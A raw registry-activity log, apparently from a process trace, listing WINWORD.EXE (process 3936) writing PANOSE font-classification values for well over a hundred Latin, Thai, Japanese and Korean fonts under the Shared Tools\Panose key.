HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@KaiTi

02010609060101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

AngsanaUPC

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Browallia New

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

BrowalliaUPC

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

CordiaUPC

020B0304020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

DilleniaUPC

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

EucrosiaUPC

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

FreesiaUPC

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

IrisUPC

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

JasmineUPC

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

KodchiangUPC

02020603050405020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

LilyUPC

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

DFKai-SB

03000509000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@DFKai-SB

03000509000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Sans Unicode

020B0602030504020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Arial Black

020B0A04020102020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Candara

020E0502030303020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Comic Sans MS

030F0702030302020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Consolas

020B0609020204030204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Constantia

02030602050306030303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Corbel

020B0503020204020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Franklin Gothic Medium

020B0603020102020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gabriola

04040605051002020D02

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Georgia

02040502050405020303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Palatino Linotype

02040502050505030304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Segoe Print

02000600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Trebuchet MS

020B0603020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Verdana

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Webdings

05030102010509060703

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Arial Unicode MS

020B0604020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Wingdings 2

05020102010507070707

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Wingdings 3

05040102010807070707

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Book Antiqua

02040602050305030304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Century Gothic

020B0502020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Haettenschweiler

020B0706040902060204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MS Outlook

05010100010000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Arial Narrow

020B0606020202030204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Garamond

02020404030301010803

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Monotype Corsiva

03010101010201010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Algerian

04020705040A02060702

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Baskerville Old Face

02020602080505020303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bauhaus 93

04030905020B02020C02

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bell MT

02020503060305020303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Berlin Sans FB

020E0602020502020306

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bernard MT Condensed

02050806060905020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bodoni MT Poster Compressed

02070706080601050204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Britannic Bold

020B0903060703020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Broadway

04040905080B02020502

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Brush Script MT

03060802040406070304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Californian FB

0207040306080B030204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Centaur

02030504050205020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Chiller

04020404031007020602

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Colonna MT

04020805060202030203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Cooper Black

0208090404030B020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Footlight MT Light

0204060206030A020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Freestyle Script

030804020302050B0404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Harlow Solid Italic

04030604020F02020D02

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Harrington

04040505050A02020702

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

High Tower Text

02040502050506030303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Jokerman

04090605060D06020702

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Juice ITC

04040403040A02020202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Kristen ITC

03050502040202030202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Kunstler Script

030304020206070D0D06

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Bright

02040602050505020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Calligraphy

03010101010101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Fax

02060602050505020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Handwriting

03010101010101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Magneto

04030805050802020D02

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Matura MT Script Capitals

03020802060602070202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Mistral

03090702030407020403

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Modern No. 20

02070704070505020303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Niagara Engraved

04020502070703030202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Niagara Solid

04020502070702020202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Old English Text MT

03040902040508030806

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Onyx

04050602080702020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Parchment

03040602040708040804

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Playbill

040506030A0602020202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Poor Richard

02080502050505020702

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Ravie

04040805050809020602

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Informal Roman

030604020304060B0204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Showcard Gothic

04020904020102020604

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Snap ITC

04040A07060A02020202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Stencil

040409050D0802020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Tempus Sans ITC

04020404030D07020202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Viner Hand ITC

03070502030502020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Vivaldi

03020602050506090804

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Vladimir Script

03050402040407070305

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Wide Latin

020A0A07050505020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Tw Cen MT

020B0602020104020603

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Tw Cen MT Condensed

020B0606020104020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Script MT Bold

03040602040607080904

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Rockwell Extra Bold

02060903040505020403

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Rockwell Condensed

02060603050405020104

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Rockwell

02060603020205020403

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Rage Italic

03070502040507070304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Pristina

03060402040406080204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Perpetua Titling MT

02020502060505020804

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Perpetua

02020502060401020303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Papyrus

03070502060502030205

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Palace Script MT

030303020206070C0B05

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

OCR A Extended

02010509020102010303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Maiandra GD

020E0502030308020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Sans Typewriter

020B0509030504030204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Lucida Sans

020B0602030504020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Imprint MT Shadow

04020605060303030202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Goudy Stout

0202090407030B020401

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Goudy Old Style

02020502050305020303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gloucester MT Extra Condensed

02030808020601010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gill Sans Ultra Bold Condensed

020B0A06020104020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gill Sans Ultra Bold

020B0A02020104020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gill Sans MT Condensed

020B0506020104020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gill Sans MT

020B0502020104020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gill Sans MT Ext Condensed Bold

020B0902020104020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Gigi

04040504061007020D02

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

French Script MT

03020402040607040605

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Franklin Gothic Medium Cond

020B0606030402020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Franklin Gothic Heavy

020B0903020102020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Franklin Gothic Demi Cond

020B0706030402020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Franklin Gothic Demi

020B0703020102020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Franklin Gothic Book

020B0503020102020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Forte

03060902040502070203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Felix Titling

04060505060202020A04

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Eras Medium ITC

020B0602030504020804

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Eras Light ITC

020B0402030504020804

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Eras Demi ITC

020B0805030504020804

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Eras Bold ITC

020B0907030504020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Engravers MT

02090707080505020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Elephant

02020904090505020303

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Edwardian Script ITC

030303020407070D0804

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Curlz MT

04040404050702020202

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Copperplate Gothic Light

020E0507020206020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Copperplate Gothic Bold

020E0705020206020404

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Century Schoolbook

02040604050505020304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Castellar

020A0402060406010301

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Calisto MT

02040603050505030304

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bradley Hand ITC

03070402050302030203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bookman Old Style

02050604050505020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bodoni MT Condensed

02070606080606020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bodoni MT Black

02070A03080606020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bodoni MT

02070603080606020203

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Blackadder ITC

04020505051007020D02

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Arial Rounded MT Bold

020F0704030504030204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Agency FB

020B0503020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Bookshelf Symbol 7

05010101010101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MS Reference Sans Serif

020B0604030504040204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MS Reference Specialty

05000500000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Berlin Sans FB Demi

020E0802020502020306

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Tw Cen MT Condensed Extra Bold

020B0803020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

OCRB

020B0609020202020204

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGGyoshotai

03000609000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGGyoshotai

03000609000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPGyoshotai

03000600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPGyoshotai

03000600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSGyoshotai

03000600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSGyoshotai

03000600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGGothicM

020B0609000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGGothicM

020B0609000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPGothicM

020B0600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPGothicM

020B0600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSGothicM

020B0600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSGothicM

020B0600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGKyokashotai

02020609000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGKyokashotai

02020609000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPKyokashotai

02020600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPKyokashotai

02020600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSKyokashotai

02020600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSKyokashotai

02020600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGMinchoB

02020809000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGMinchoB

02020809000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPMinchoB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPMinchoB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSMinchoB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSMinchoB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGMinchoE

02020909000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGMinchoE

02020909000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPMinchoE

02020900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPMinchoE

02020900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSMinchoE

02020900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSMinchoE

02020900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSoeiPresenceEB

02020809000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSoeiPresenceEB

02020809000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPSoeiPresenceEB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPSoeiPresenceEB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSSoeiPresenceEB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSSoeiPresenceEB

02020800000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSeikaishotaiPRO

03000600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSeikaishotaiPRO

03000600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSoeiKakupoptai

040B0A09000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSoeiKakupoptai

040B0A09000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPSoeiKakupoptai

040B0A00000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPSoeiKakupoptai

040B0A00000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSSoeiKakupoptai

040B0A00000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSSoeiKakupoptai

040B0A00000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSoeiKakugothicUB

020B0909000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSoeiKakugothicUB

020B0909000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPSoeiKakugothicUB

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPSoeiKakugothicUB

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSSoeiKakugothicUB

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSSoeiKakugothicUB

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGMaruGothicMPRO

020F0600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGMaruGothicMPRO

020F0600000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGGothicE

020B0909000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGGothicE

020B0909000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGPGothicE

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGPGothicE

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HGSGothicE

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HGSGothicE

020B0900000000000000

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Ami R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Ami R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Headline R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Headline R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Yet R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Yet R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Magic R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Magic R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

MoeumT R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@MoeumT R

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

Expo M

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@Expo M

02030504000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYGraphic-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYGraphic-Medium

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYGungSo-Bold

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYGungSo-Bold

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

HYGothic-Extra

02030600000101010101

3936

WINWORD.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose

@HYGothic-Extra

02030600000101010101

3936

